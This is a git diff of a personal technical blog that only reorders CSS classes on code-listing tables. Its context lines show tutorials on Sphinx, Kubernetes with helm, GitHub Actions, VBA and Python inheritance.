     <p>Which was resolved through <a href="https://stackoverflow.com/questions/72620996/apple-m1-symbol-not-found-cfrelease-while-running-python-app">https://stackoverflow.com/questions/72620996/apple-m1-symbol-not-found-cfrelease-while-running-python-app</a></p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>pip uninstall grpcio -y
     conda install grpcio -y
     </code></pre></div>
    @@ -52,7 +52,7 @@ conda install grpcio -y
     <p>Finally we can run:</p>
     <p><code>mlagents-learn</code></p>
     <p>To be met with this glorious screen</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    diff --git a/feeds/software-development.atom.xml b/feeds/software-development.atom.xml
    index 34ea2018..53e9a9aa 100644
    --- a/feeds/software-development.atom.xml
    +++ b/feeds/software-development.atom.xml
    @@ -675,12 +675,12 @@ code, markup and prose".</p>
     <p>If there is anything I have missed, please feel free to drop a comment below and I will update this post!</p></body>Automatically Generate Documentation with Sphinx2020-02-03T00:00:00+11:002020-02-03T00:00:00+11:00Jack McKewtag:jackmckew.dev,2020-02-03:/automatically-generate-documentation-with-sphinx.html<body><h2 id="document-code-automatically-through-docstrings-with-sphinx"><strong>Document code automatically through docstrings with Sphinx</strong></h2>
     <p>This post goes into how to generate documentation for your python projects automatically with Sphinx!</p>
     <p>First off we have to install sphinx into our virtual environment. Pending on your flavour, we can do any of the following</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2
     3</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>pip install sphinx …</code></pre></div></td></tr></tbody></table></body><body><h2 id="document-code-automatically-through-docstrings-with-sphinx"><strong>Document code automatically through docstrings with Sphinx</strong></h2>
     <p>This post goes into how to generate documentation for your python projects automatically with Sphinx!</p>
     <p>First off we have to install sphinx into our virtual environment. Pending on your flavour, we can do any of the following</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2
     3</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>pip install sphinx
     conda install sphinx
    @@ -688,13 +688,13 @@ pipenv install sphinx
     </code></pre></div>
     </td></tr></tbody></table>
     <p>Once you have installed sphinx, inside the project (let's use the directory of this blog post), we can create a docs folder in which all our documentation will live.</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>mkdir docs
     <span class="nb">cd</span> docs
     </code></pre></div>
     </td></tr></tbody></table>
     <p>Ensuring to have our virtual environment with sphinx installed active, we run <code>sphinx-quickstart</code>, this tool allows us to populate some information for our documentation in a nice Q&amp;A style.</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    @@ -768,27 +768,27 @@ where <span class="s2">"builder"</span> is one of the supported buil
     </code></pre></div>
     </td></tr></tbody></table>
     <p>Now let's create an example package that we can write some documentation in.</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>mkdir sphinxdemo
     <span class="nb">cd</span> sphinxdemo
     </code></pre></div>
     </td></tr></tbody></table>
     <p>Then we create 3 files inside our example package:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>__init__.py
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>__init__.py
     </code></pre></div>
     </td></tr></tbody></table>
     <figure class="code">
     <figcaption><a href="/2020/documentation-with-sphinx/sphinxdemo/__init__.py">download</a>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="err">version = "0.1.1"</span>
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="err">version = "0.1.1"</span>
     </code></pre></div>
     </td></tr></tbody></table>
     </figcaption></figure>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>__main__.py
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>__main__.py
     </code></pre></div>
     </td></tr></tbody></table>
     <figure class="code">
     <figcaption><a href="/2020/documentation-with-sphinx/sphinxdemo/__main__.py">download</a>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2
     3
     4
    @@ -802,12 +802,12 @@ where <span class="s2">"builder"</span> is one of the supported buil
     </code></pre></div>
     </td></tr></tbody></table>
     </figcaption></figure>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>file_functions.py
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>file_functions.py
     </code></pre></div>
     </td></tr></tbody></table>
     <figure class="code">
     <figcaption><a href="/2020/documentation-with-sphinx/sphinxdemo/file_functions.py">download</a>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    @@ -850,12 +850,12 @@ where <span class="s2">"builder"</span> is one of the supported buil
     <p>We need to enable the napoleon sphinx extensions in docs/conf.py for this style to work.</p>
     </blockquote>
     <p>The resulting documented code will look like:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>__init__.py
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>__init__.py
     </code></pre></div>
     </td></tr></tbody></table>
     <figure class="code">
     <figcaption><a href="/2020/documentation-with-sphinx/sphinxdemo_with_docs/__init__.py">download</a>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2
     3
     4
    @@ -869,12 +869,12 @@ where <span class="s2">"builder"</span> is one of the supported buil
     </code></pre></div>
     </td></tr></tbody></table>
     </figcaption></figure>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>__main__.py
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>__main__.py
     </code></pre></div>
     </td></tr></tbody></table>
     <figure class="code">
     <figcaption><a href="/2020/documentation-with-sphinx/sphinxdemo_with_docs/__main__.py">download</a>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    @@ -900,12 +900,12 @@ where <span class="s2">"builder"</span> is one of the supported buil
     </code></pre></div>
     </td></tr></tbody></table>
     </figcaption></figure>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>file_functions.py
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>file_functions.py
     </code></pre></div>
     </td></tr></tbody></table>
     <figure class="code">
     <figcaption><a href="/2020/documentation-with-sphinx/sphinxdemo_with_docs/file_functions.py">download</a>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    @@ -971,7 +971,7 @@ where <span class="s2">"builder"</span> is one of the supported buil
     <p>Our <code>conf.py</code> file for sphinx's configuration results in:</p>
     <figure class="code">
     <figcaption><span>Sphinx Configuration File conf.py</span> <a href="/2020/documentation-with-sphinx/docs/source/conf.py">download</a>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    @@ -1094,7 +1094,7 @@ where <span class="s2">"builder"</span> is one of the supported buil
     <p>We must also set our index.rst (restructured text) with what we want to see in our documentation.</p>
     <figure class="code">
     <figcaption><span>Documentation Index File index.rst</span> <a href="/2020/documentation-with-sphinx/docs/source/index.rst">download</a>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    @@ -1156,7 +1156,7 @@ where <span class="s2">"builder"</span> is one of the supported buil
     <p>To generate individual pages for our modules, classes and functions, we define separate templates, these are detailed here: <a href="https://github.com/JackMcKew/jackmckew.dev/tree/master/content/2020/documentation-with-sphinx/docs/source/_templates">autosummary templates</a></p>
     </blockquote>
     <p>Next we navigate our <code>docs</code> directory, and finally run:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>make html
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>make html
     </code></pre></div>
     </td></tr></tbody></table>
     <p>This will generate all the stubs for our documentation and compile them into HTML format.</p>
    @@ -1187,12 +1187,12 @@ where <span class="s2">"builder"</span> is one of the supported buil
     <p><a href="http://www.pelicanthemes.com/">http://www.pelicanthemes.com/</a></p>
     <p>Which lets you scroll through the various themes, and even links to the repository on github for the theme if you wish to use it. The theme I decided on was <a href="https://github.com/alexandrevicenzi/Flex">Flex by Alexandre Vicenzi</a>.</p>
     <p>Apply the the theme was as simple as cloning the repo (or using <a href="https://www.atlassian.com/git/tutorials/git-submodule">git submodules</a>), and adding one line of code in pelicanconf.py (generated automatically by pelican-quickstart).</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="n">THEME</span> <span class="o">=</span> <span class="s2">"./themes/Flex"</span>
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code><span class="n">THEME</span> <span class="o">=</span> <span class="s2">"./themes/Flex"</span>
     </code></pre></div>
     </td></tr></tbody></table>
     <h4 id="plugins">Plugins</h4>
     <p>Admittedly, I just tried out all the plugins in the <a href="https://github.com/getpelican/pelican-plugins">Pelican Plugins Repository</a> until I found the combination that works for me, this ended up being:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    @@ -1240,7 +1240,7 @@ where <span class="s2">"builder"</span> is one of the supported buil
     <p>Now that I had the skeleton of the website set up, I needed to bring in all the existing posts from wordpress. By following another guide within the Pelican documentation, this was a relatively simple task <a href="http://docs.getpelican.com/en/3.6.3/importer.html">http://docs.getpelican.com/en/3.6.3/importer.html</a>. However, I did spend the time to go through and edit each markdown to remove redundant 'wordpress' formatting tags manually.</p>
     <h4 id="linking-to-content">Linking to Content</h4>
     <p>As one of the main tasks of this project was to consolidate articles with the content/code/analysis in one spot, initially in development following the guide in <a href="http://docs.getpelican.com/en/3.6.3/content.html">http://docs.getpelican.com/en/3.6.3/content.html</a>.</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2
     3
     4
    @@ -1260,7 +1260,7 @@ where <span class="s2">"builder"</span> is one of the supported buil
     </code></pre></div>
     </td></tr></tbody></table>
     <p>I ended up with a structure like above, which annoyed me a bit as now the content was in one place, but still divided into 3 folders with little-to-no link between them, my goal was to have the structure like:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    @@ -1288,7 +1288,7 @@ where <span class="s2">"builder"</span> is one of the supported buil
     <p>To be honest, I was actually surprised at how easy it was to turn Travis CI and that I could spin up a virtual machine, install all the dependencies and re-build the website. However, I had a lot of trouble trying to get Travis CI to push back to the repository such that Netlify could build from it.</p>
     <p>This was later remedied by setting a repository secret variable on Travis CI as I couldn't get the secret token encrypted by Travis CI CLI (Ruby application).</p>
     <p>In essence, all that was needed was a .travis.yml file in the root directory which ended up like this:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    diff --git a/feeds/software.atom.xml b/feeds/software.atom.xml
    index 285886f3..96e98fb0 100644
    --- a/feeds/software.atom.xml
    +++ b/feeds/software.atom.xml
    @@ -69,7 +69,7 @@
     </ol>
     <p>For the most part, we will be making use of <code>run</code> commands, as if we are interacting with the terminal in the runtime of ubuntu (Linux). Otherwise, we can make use of pre-made actions from the marketplace. One note to be made is that the AWS Elastic Beanstalk application has been set up to run specifically on Docker, and as such we need to upload the relevant Dockerfile (production) along with any assets.</p>
     <p>The contents of the Github Action in whole will be:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    @@ -290,7 +290,7 @@
     <h2 id="setting-up-ingress-nginx">Setting up Ingress-Nginx</h2>
     <p>Before we can access our application through an IP or web address, we need to set up <code>ingress-nginx</code>, similar to how we did with <code>docker-compose</code> in previous posts. Luckily, we can make use of <code>helm</code> to add this functionality for us (provided we'd set up nginx configuration like we already have). This can be done by sshing into the terminal of our Kubernetes cluster, or similarly making use of the Cloud Shell provided by Google Cloud.</p>
     <p>Firstly which we need to install helm (<a href="https://helm.sh/docs/intro/install/#from-script">https://helm.sh/docs/intro/install/#from-script</a>):</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2
     3</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>curl -fsSL -o get_helm.sh https://raw.githubusercontent.com/helm/helm/master/scripts/get-helm-3
     chmod <span class="m">700</span> get_helm.sh
    @@ -298,7 +298,7 @@ chmod <span class="m">700</span> get_helm.sh
     </code></pre></div>
     </td></tr></tbody></table>
     <p>Followed by setting up <code>ingress-nginx</code> (<a href="https://kubernetes.github.io/ingress-nginx/deploy/#using-helm">https://kubernetes.github.io/ingress-nginx/deploy/#using-helm</a>):</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>helm repo add ingress-nginx https://kubernetes.github.io/ingress-nginx
     helm install my-release ingress-nginx/ingress-nginx
     </code></pre></div>
    @@ -396,7 +396,7 @@ helm install my-release ingress-nginx/ingress-nginx
     <h2 id="clusterip-service">ClusterIP Service</h2>
     <p>We need to set up a ClusterIP service for each of our deployments except the worker deployment. This will allow our services to communicate with others inside the node.</p>
     <p>To do this, we create a configuration <code>yaml</code> file:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    @@ -453,7 +453,7 @@ A <em>persistant</em> volume is not tied directly to pods, but is ti
     </tr>
     </tbody>
     </table>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    @@ -482,7 +482,7 @@ A <em>persistant</em> volume is not tied directly to pods, but is ti
     <h2 id="environment-variables">Environment Variables</h2>
     <p>Some of our pods depend on environment variables being set to work correctly (eg, REDIS_HOST, PGUSER, etc). We add using the <code>env</code> key to our <code>spec</code> &gt; <code>containers</code> configuration.</p>
     <p>For example, for our worker to connect to the redis deployment:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2
     3
     4
    @@ -504,7 +504,7 @@ A <em>persistant</em> volume is not tied directly to pods, but is ti
     <p>Note that for the value of the <code>REDIS_HOST</code> we are stating the name of the ClusterIP service we had previously set up. Kubernetes will automatically resolve this for us to be the correct IP, how neat!</p>
     <h3 id="secrets">Secrets</h3>
     <p>Secrets are another type of object inside of Kubernetes that are used to store sensitive information we don't want to live in the plain text of the configuration files. We do this through a <code>kubectl</code> commad:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>kubectl create secret <span class="o">[</span>secret_type<span class="o">]</span> <span class="o">[</span>secret_name<span class="o">]</span> --from-literal <span class="nv">key</span><span class="o">=</span>value
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1</pre></div></td><td class="code"><div class="highlight"><pre><span></span><code>kubectl create secret <span class="o">[</span>secret_type<span class="o">]</span> <span class="o">[</span>secret_name<span class="o">]</span> --from-literal <span class="nv">key</span><span class="o">=</span>value
     </code></pre></div>
     </td></tr></tbody></table>
     <p>There are 3 types of secret types, <code>generic</code>, <code>docker_registry</code> and <code>tls</code>, most of the time we'll be making use of the <code>generic</code> secret type. Similar to how we consume other services, we will be consuming the secret from the <code>secret_name</code> parameter. The names (but not the value) can always be retrieved through <code>kubectl get secrets</code>.</p>
    @@ -513,7 +513,7 @@ A <em>persistant</em> volume is not tied directly to pods, but is ti
     </blockquote>
     <h3 id="consuming-secrets-as-environment-variable">Consuming Secrets as Environment Variable</h3>
     <p>Consuming a secret as an environment variable for a container is a little different to other environment variables. As secrets can contain multiple key value pairs, we need to specify the secret and the key to retrieve the value from:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre>1
     2
     3
     4
    @@ -527,7 +527,7 @@ A <em>persistant</em> volume is not tied directly to pods, but is ti
     <h2 id="ingress-service">Ingress Service</h2>
     <p>The ingress service allows us to connect to other Kubernetes cluster from outside, and thus maintains how we should treat incoming requests and how to route them.</p>
     <p>The entirety of our configuration for the ingress service is:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    diff --git a/feeds/vba.atom.xml b/feeds/vba.atom.xml
    index 9e875ca8..dad5bd31 100644
    --- a/feeds/vba.atom.xml
    +++ b/feeds/vba.atom.xml
    @@ -89,7 +89,7 @@
     <p>After researching the internet when I came across this problem, I stumbled across a similar question on Stackoverflow:</p>
     <p><a href="https://stackoverflow.com/questions/58381445/how-to-get-value-of-visible-cell-in-a-table-after-filtering-only-working-for-1">https://stackoverflow.com/questions/58381445/how-to-get-value-of-visible-cell-in-a-table-after-filtering-only-working-for-1</a></p>
     <p>With one of the answers from <a href="https://stackoverflow.com/users/445425/chris-neilsen">Chris Neilsen</a> being:</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    @@ -158,7 +158,7 @@
     <li><code>iCol</code> - The column index we want to return</li>
     </ul>
     <p>Without further ado, here is the function. Note that another function <code>GetListObject</code> is used to find the table in question see <a href="#getlistobject-function">GetListObject Function</a> for more information on this. Otherwise you can use <code>Application.Worksheets(sheetName)</code>.</p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    @@ -208,7 +208,7 @@
     <h2 id="getlistobject-function">GetListObject Function</h2>
     <p>Similarly, the GetListObject function was also found on Stackoverflow, by the user <a href="https://stackoverflow.com/users/20151/andrewd">AndrewD</a>:</p>
     <p><a href="https://stackoverflow.com/questions/18030637/how-do-i-reference-tables-in-excel-using-vba">https://stackoverflow.com/questions/18030637/how-do-i-reference-tables-in-excel-using-vba</a></p>
    -<table class="table table-striped highlighttable"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
    +<table class="highlighttable table table-striped"><tbody><tr><td class="linenos"><div class="linenodiv"><pre> 1
      2
      3
      4
    diff --git a/files/Jack_McKew_CV.pdf b/files/Jack_McKew_CV.pdf
    index baf40325..e88f7698 100644
    Binary files a/files/Jack_McKew_CV.pdf and b/files/Jack_McKew_CV.pdf differ
    diff --git a/find-nth-visible-cell-with-vba-excel.html b/find-nth-visible-cell-with-vba-excel.html
    index 0f6e8a2c..f6a96aec 100644
    --- a/find-nth-visible-cell-with-vba-excel.html
    +++ b/find-nth-visible-cell-with-vba-excel.html
    @@ -248,7 +248,7 @@ 

    Function to Find Visible Row

    After researching the internet when I came across this problem, I stumbled across a similar question on Stackoverflow:

    https://stackoverflow.com/questions/58381445/how-to-get-value-of-visible-cell-in-a-table-after-filtering-only-working-for-1

    With one of the answers from Chris Neilsen being:

    -
     1
    +
     1
      2
      3
      4
    @@ -317,7 +317,7 @@ 

    Function for Visible Cell

  • iCol - The column index we want to return
  • Without further ado, here is the function. Note that another function GetListObject is used to find the table in question see GetListObject Function for more information on this. Otherwise you can use Application.Worksheets(sheetName).

    -
     1
    +
     1
      2
      3
      4
    @@ -367,7 +367,7 @@ 

    Function for Visible Cell

    GetListObject Function

    Similarly, the GetListObject function was also found on Stackoverflow, by the user AndrewD:

    https://stackoverflow.com/questions/18030637/how-do-i-reference-tables-in-excel-using-vba

    -
     1
    +
     1
      2
      3
      4
    diff --git a/getting-started-with-p5js.html b/getting-started-with-p5js.html
    index f0550131..d6e9d6e5 100644
    --- a/getting-started-with-p5js.html
    +++ b/getting-started-with-p5js.html
    @@ -163,7 +163,7 @@ 

    Getting Started with P5.js

    Next in the draw function, which is repeatedly called while the browser has the page open, we loop through all the objects in the array and draw a circle (ellipse with equal radii) and colour it according to how big it's radius is (this is as to watch it fade as it grows). We make use of the stroke function to define the colour of the lines for what we'll be drawing in that instance. If a drop has become too big we remove it from the array and add a new random drop, if it's still undersize we increase it's radius and colour.

    Finally to add interactivity, we make use of the mouseIsPressed variable to determine if the user has clicked on the visualization and add a drop into the array at the X & Y position of where the user clicked.

    -
     1
    +
     1
      2
      3
      4
    diff --git a/github-actions-for-cicd.html b/github-actions-for-cicd.html
    index 6366f0f4..b19a9dba 100644
    --- a/github-actions-for-cicd.html
    +++ b/github-actions-for-cicd.html
    @@ -179,7 +179,7 @@ 

    Action Marketplace

    Action Format (.yaml)

    A Github Action is defined with a <action_name>.yaml file which must be placed within .github/workflows from the base of the repository. As many actions as you want can be placed in this folder, and will subsequently run when triggered.

    The base structure of a link_checker.yaml file is:

    -
     1
    +
     1
      2
      3
      4
    @@ -254,7 +254,7 @@ 

    Actions on Pull Request

    Fork repository > Make changes > Submit Pull Request with changes > Check changes > Merge into repository

    When the action was first set up for actions to run on pull requests, it kept throwing an error:

    -
    1
    The process '/usr/bin/git' failed with exit code 1
    +
    1
    The process '/usr/bin/git' failed with exit code 1
     

    This was determined to be intentional design by Github as a mitigation against the possibility that a bad actor could open PRs against your repo and do things like list out secrets or just run up a large bill (once we start charging) on your account.

    @@ -272,7 +272,7 @@

    Actions on Pull Request

    Ensure to use if: steps.prcomm.outputs.BOOL_TRIGGERED == 'true' in all subsequent jobs you want triggered if the phrase is found, otherwise the action will become recursive: check for comment, run checks, make a comment, check for comment, etc

    -
     1
    +
     1
      2
      3
      4
    diff --git a/how-pandas_alive-was-made.html b/how-pandas_alive-was-made.html
    index 7b1eebea..7039ebe3 100644
    --- a/how-pandas_alive-was-made.html
    +++ b/how-pandas_alive-was-made.html
    @@ -181,7 +181,7 @@ 

    Architecture

    Base Class

    Now that we've decided to go with template design pattern, we need to implement the base chart class with the shared functionality. At this point, since there would be so many parameters going into the class constructor (__init__) in Python, it was frustrating having to put this information in two places.

    Here is a basic example, but imagine if you had 10s of arguments (eg, name, species) and had to replicate this information so many times.

    -
    1
    +
    1
     2
     3
     4
    class Animal():
    @@ -192,7 +192,7 @@ 

    Base Class

    So once again, we research how someone else has already solved this problem, and we found attrs. Attrs allows us to create our classes and have the __init__ and other dunder methods generated for us (see a previous post on dunder methods here).

    This allows us to write the same class as above like:

    -
    1
    +
    1
     2
     3
     4
    @attr.s
    diff --git a/how-to-make-github-actions.html b/how-to-make-github-actions.html
    index 4f8d4c73..9b5cc6e6 100644
    --- a/how-to-make-github-actions.html
    +++ b/how-to-make-github-actions.html
    @@ -217,7 +217,7 @@ 

    Entrypoint.sh

    Publish to Marketplace

    Once you've implemented these few files, you should get a warning at the top of the repository on GitHub hinting if you want to publish this on the marketplace. This is done smoothly with creating a release of your project, and that's it, done!

    Now users can intergrate your action into the CI/CD pipeline as easily as:

    -
    1
    +
    1
     2
    - name: Python Interrogate Check
       uses: JackMcKew/python-interrogate-check@v0.1.1
     
    diff --git a/index6.html b/index6.html index 226a4d4c..df905770 100644 --- a/index6.html +++ b/index6.html @@ -335,7 +335,7 @@

    Document code automatically through docstrings with Sphinx

    This post goes into how to generate documentation for your python projects automatically with Sphinx!

    First off we have to install sphinx into our virtual environment. Pending on your flavour, we can do any of the following

    -
    1
    +
    1
     2
     3
    pip install sphinx …

    diff --git a/inheritance-in-python.html b/inheritance-in-python.html index d967fc5d..ccadc2ef 100644 --- a/inheritance-in-python.html +++ b/inheritance-in-python.html @@ -168,7 +168,7 @@

    Inheritance in Python

    This post will cover an introduction to the concept of inheritance using Python and the animal kingdom.

    First off, we are going to start by defining our 'base' class (also known as abstract class) of our Animal with common properties:

    -
     1
    +
     1
      2
      3
      4
    @@ -194,7 +194,7 @@ 

    Inheritance in Python

    Now that we have our base class, we can define a subclass 'Dog' that will be able to speak if we define the function inside, but we can also see that it derives from it's parent class 'Animal' by printing out it's family.

    -
     1
    +
     1
      2
      3
      4
    @@ -218,14 +218,14 @@ 

    Inheritance in Python

    Which will print out:

    -
    1
    +
    1
     2
    Woof!
     Animal Kingdom
     

    See my post on dunders (double underscores) to get a better understanding of how the __init__ function is working: https://jackmckew.dev/dunders-in-python.html

    Now we can define any subclass which can derive from our parent class 'Animal', or even more we can derive a class from 'Dog' and it will have all it's properties:

    -
    1
    +
    1
     2
     3
     4
    @@ -241,13 +241,13 @@ 

    Inheritance in Python

    Which will also print:

    -
    1
    +
    1
     2
    Woof!
     Animal Kingdom
     

    Now what if we wanted to specify the family that all of our dog classes are, we can do this by overriding their parent class (similar to how we are overriding the speak function):

    -
    1
    +
    1
     2
     3
     4
    @@ -267,7 +267,7 @@ 

    Inheritance in Python

    Which then when we run both the below code:

    -
     1
    +
     1
      2
      3
      4
    @@ -291,7 +291,7 @@ 

    Inheritance in Python

    We will now get:

    -
    1
    +
    1
     2
     3
     4
    Woof!
    diff --git a/intro-to-docker.html b/intro-to-docker.html
    index 0624ad6b..4b1f2331 100644
    --- a/intro-to-docker.html
    +++ b/intro-to-docker.html
    @@ -242,7 +242,7 @@ 

    Maintaining Docker in the Comman

    Dockerfile

    A Dockerfile is a read-only template with instructions for creating a Docker container/image. It's composed with a series of commands, along with their given arguments. A straightforward example of a Dockerfile is:

    -
    1
    +
    1
     2
     3
     4
